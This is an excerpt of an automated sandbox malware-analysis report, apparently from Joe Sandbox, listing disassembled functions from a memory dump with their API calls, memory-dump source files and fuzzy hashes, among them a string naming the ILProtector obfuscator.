                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0BC020 Relevance: 12.3, APIs: 8, Instructions: 309COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit
                                                                      • String ID:
                                                                      • API String ID: 2610073882-0
                                                                      • Opcode ID: c900c3dde11484adc937f17033b5125899f329a6fe6620640bbee716b4c49149
                                                                      • Instruction ID: 2c5b6ea06d41f68dad0577d829a98c7bdfd01777d5f2e0df17e993f42bbcb141
                                                                      • Opcode Fuzzy Hash: c900c3dde11484adc937f17033b5125899f329a6fe6620640bbee716b4c49149
                                                                      • Instruction Fuzzy Hash: 65C124716087009FD300DF68C880E5AB7E9BFC9704F648A5EF9989B365D736E845CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0B16B0 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 487COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                      • std::tr1::_Xweak.LIBCPMT ref: 6F0B1B53
                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 6F0B1B5D
                                                                      • std::exception::exception.LIBCMT ref: 6F0B1C43
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0B1C58
                                                                      Strings
                                                                      • invalid vector<T> subscript, xrefs: 6F0B1B58
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8ThrowXinvalid_argumentXweak_mallocstd::_std::exception::exceptionstd::tr1::_
                                                                      • String ID: invalid vector<T> subscript
                                                                      • API String ID: 3098024973-3016609489
                                                                      • Opcode ID: f6d3eda53882f801a4ab2007a84123778195e818e1ee2b369a0ea2f6aa3b078d
                                                                      • Instruction ID: 2adb27f35864b598edc26f022a3382566f88900e641c38260cb9295a6b8144b1
                                                                      • Opcode Fuzzy Hash: f6d3eda53882f801a4ab2007a84123778195e818e1ee2b369a0ea2f6aa3b078d
                                                                      • Instruction Fuzzy Hash: 58222A75C00709DFCB14CFA4C490AEEBBF5BF44314F508A5ED45AAB294E775AA88CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0C3C10 Relevance: 7.7, APIs: 5, Instructions: 186COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayGetElement.OLEAUT32(?,?,F3D820D6), ref: 6F0C3C49
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C3C81
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C3D26
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C3D30
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C3D89
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ArrayElementInitSafe
                                                                      • String ID:
                                                                      • API String ID: 4110538090-0
                                                                      • Opcode ID: 174d7ddd15d534cc80d74d3933ec3b1d8ab101b5246a703cd90a6ff1b23fb729
                                                                      • Instruction ID: ec9813d68045281ad1fc00a0135d22c06b30bddf626bfb1797c20ff03133ae50
                                                                      • Opcode Fuzzy Hash: 174d7ddd15d534cc80d74d3933ec3b1d8ab101b5246a703cd90a6ff1b23fb729
                                                                      • Instruction Fuzzy Hash: 48616E72A10249DFCB00DFA8D885ADEB7B5FF49310F24856AE515AB350C731AD45CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0BDB30 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(6F0C31EC), ref: 6F0BDB5E
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F0BDB6E
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F0BDB82
                                                                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F0BDBF1
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0BDBFB
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Variant$ClearCreateDestroyElementInitVector
                                                                      • String ID:
                                                                      • API String ID: 182531043-0
                                                                      • Opcode ID: d0b9910a88d57fb83fe886f9ffca3cbbf685d81e6629145c08cfd78ab197d810
                                                                      • Instruction ID: 65d03733beeddc881698e6a0242c5a1aeee257d89bc897c58dc7544d343b91ea
                                                                      • Opcode Fuzzy Hash: d0b9910a88d57fb83fe886f9ffca3cbbf685d81e6629145c08cfd78ab197d810
                                                                      • Instruction Fuzzy Hash: CD31A07AA01605EFD700DF94C844EEEBBF9FF8A760F10815AE911AB340D735A811CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0D1FD0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 175COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                      • std::exception::exception.LIBCMT ref: 6F0D2206
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0D2221
                                                                        • Part of subcall function 6F0D6480: __CxxThrowException@8.LIBCMT ref: 6F0D6518
                                                                        • Part of subcall function 6F0D6480: __CxxThrowException@8.LIBCMT ref: 6F0D6558
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throw$_mallocstd::exception::exception
                                                                      • String ID: @-o .o$ILProtector
                                                                      • API String ID: 84431791-3048724353
                                                                      • Opcode ID: 32966d3f0ecf46121e35e6164f6af3e60b542de23942d2791b2dc20f2874c9fd
                                                                      • Instruction ID: 228695f2a48ab3c638057cb68096726bdc32c26e712480a7a538c22cb3be5619
                                                                      • Opcode Fuzzy Hash: 32966d3f0ecf46121e35e6164f6af3e60b542de23942d2791b2dc20f2874c9fd
                                                                      • Instruction Fuzzy Hash: F4710675D057599FCB14CFA8C984BDEBBB4BF49310F1081AAE419A7344DB706A84CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0CC410 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F0CC478
                                                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F0CC488
                                                                      • SafeArrayGetElement.OLEAUT32(?,00000001,?), ref: 6F0CC4B4
                                                                      • SafeArrayDestroy.OLEAUT32(?), ref: 6F0CC512
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Bound$DestroyElement
                                                                      • String ID:
                                                                      • API String ID: 3987547017-0
                                                                      • Opcode ID: 65c3df2acf37cb51306bd0fe6f7dafbe781c03ad4423bccb9279df0009ecb642
                                                                      • Instruction ID: dd7592e557dc30abde760af460bd6cbf83ade07256202f6db71853114e8f49d4
                                                                      • Opcode Fuzzy Hash: 65c3df2acf37cb51306bd0fe6f7dafbe781c03ad4423bccb9279df0009ecb642
                                                                      • Instruction Fuzzy Hash: 0741FF75A00149AFDF00DF98C884EEEB7B9FB49354F10C56AF919E7241D730AA85CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0A5A30 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                      • std::exception::exception.LIBCMT ref: 6F0A5ACB
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0A5AE0
                                                                      • std::exception::exception.LIBCMT ref: 6F0A5B18
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0A5B2D
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throwstd::exception::exception$_malloc
                                                                      • String ID:
                                                                      • API String ID: 3153320871-0
                                                                      • Opcode ID: 60323e40a054e1b3c68fbe090941aeed5cb8bae33044cc2d3cc39478f5d1086e
                                                                      • Instruction ID: 6078aa9007b456e5bf6b51b9ef39c95622ed68429606a9e5706d380ffc2c3392
                                                                      • Opcode Fuzzy Hash: 60323e40a054e1b3c68fbe090941aeed5cb8bae33044cc2d3cc39478f5d1086e
                                                                      • Instruction Fuzzy Hash: 1B3164B5900708ABC714DF99D950A9ABBF8FF44790F40C26EE81597740EB71A914CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0D8D80 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 6F0D8D8A
                                                                        • Part of subcall function 6F109D66: __FF_MSGBANNER.LIBCMT ref: 6F109D7F
                                                                        • Part of subcall function 6F109D66: __NMSG_WRITE.LIBCMT ref: 6F109D86
                                                                        • Part of subcall function 6F109D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6F109BD4,6F0A1290,F3D820D6), ref: 6F109DAB
                                                                        • Part of subcall function 6F1091F6: std::_Lockit::_Lockit.LIBCPMT ref: 6F109202
                                                                      • _malloc.LIBCMT ref: 6F0D8DAF
                                                                      • std::exception::exception.LIBCMT ref: 6F0D8DD4
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0D8DEB
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: _malloc$AllocateException@8HeapLockitLockit::_Throwstd::_std::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 3043633502-0
                                                                      • Opcode ID: cbcb3d01d737ade8465d44a74f88bb0eac10480956e421269e68c8037082c119
                                                                      • Instruction ID: bccf9d800194207e655bf1ab8e52985320100aff4d122b20bf8cd9c70b04576a
                                                                      • Opcode Fuzzy Hash: cbcb3d01d737ade8465d44a74f88bb0eac10480956e421269e68c8037082c119
                                                                      • Instruction Fuzzy Hash: D8F0F07280831167D200FB95AD71B9F36F8AFA16A0F80081CF854A1284EF21F228C6F3
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F109BB5 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 6F109BCF
                                                                        • Part of subcall function 6F109D66: __FF_MSGBANNER.LIBCMT ref: 6F109D7F
                                                                        • Part of subcall function 6F109D66: __NMSG_WRITE.LIBCMT ref: 6F109D86
                                                                        • Part of subcall function 6F109D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6F109BD4,6F0A1290,F3D820D6), ref: 6F109DAB
                                                                      • std::exception::exception.LIBCMT ref: 6F109C04
                                                                      • std::exception::exception.LIBCMT ref: 6F109C1E
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F109C2F
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                      • String ID:
                                                                      • API String ID: 615853336-0
                                                                      • Opcode ID: ae00e637c9d17b6724128c95254e1e1c83f4cebf2720af6755149b53291bee8c
                                                                      • Instruction ID: bc209ce93b5f1eb6db11d7b0929c9da2d290269226381eb293223ddf33327154
                                                                      • Opcode Fuzzy Hash: ae00e637c9d17b6724128c95254e1e1c83f4cebf2720af6755149b53291bee8c
                                                                      • Instruction Fuzzy Hash: B6F0A4B140160DEADF04FBA5CD34E9D7AF9AB827E8F800519D400E63D9DF71A675CA50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0B9110 Relevance: 5.1, APIs: 4, Instructions: 122COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6F0B913B
                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6F0B915C
                                                                      • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 6F0B9170
                                                                      • LeaveCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 6F0B9191
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave
                                                                      • String ID:
                                                                      • API String ID: 3168844106-0
                                                                      • Opcode ID: 99b1d1608301f38af0c7d34b611395ad4bab0f1a5f5cef53080f12e937d533d2
                                                                      • Instruction ID: 6787e74f23db9896317830120cf859bfae79a371b50c41dd7bf0f516a1ae9ca5
                                                                      • Opcode Fuzzy Hash: 99b1d1608301f38af0c7d34b611395ad4bab0f1a5f5cef53080f12e937d533d2
                                                                      • Instruction Fuzzy Hash: A04160769002099FCB04DF98D8849EEBBF4FF99310B11855ED816AB340D731AA05CFE0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0A5450 Relevance: 4.8, APIs: 3, Instructions: 257COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                      • std::tr1::_Xweak.LIBCPMT ref: 6F0A56D7
                                                                      • std::exception::exception.LIBCMT ref: 6F0A5734
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0A574B
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8ThrowXweak_mallocstd::exception::exceptionstd::tr1::_
                                                                      • String ID:
                                                                      • API String ID: 2092180293-0
                                                                      • Opcode ID: 0969c32cc6718561d7da62e86dad0824b3b052d1a96372f6612c2686ad790ff7
                                                                      • Instruction ID: 5c2b9b702a328528e965aa7ee1ee23cdfdf66a1e39e576e457a2489319d9b378
                                                                      • Opcode Fuzzy Hash: 0969c32cc6718561d7da62e86dad0824b3b052d1a96372f6612c2686ad790ff7
                                                                      • Instruction Fuzzy Hash: 12A139B45047058FC724CF68C090A6AB7F6FF88654F148F4EE49A9B685E771EA48CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0B8E20 Relevance: 4.7, APIs: 3, Instructions: 162COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32 ref: 6F0B8E89
                                                                      • LeaveCriticalSection.KERNEL32(?,00000000), ref: 6F0B8EAD
                                                                      • _memset.LIBCMT ref: 6F0B8ED2
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
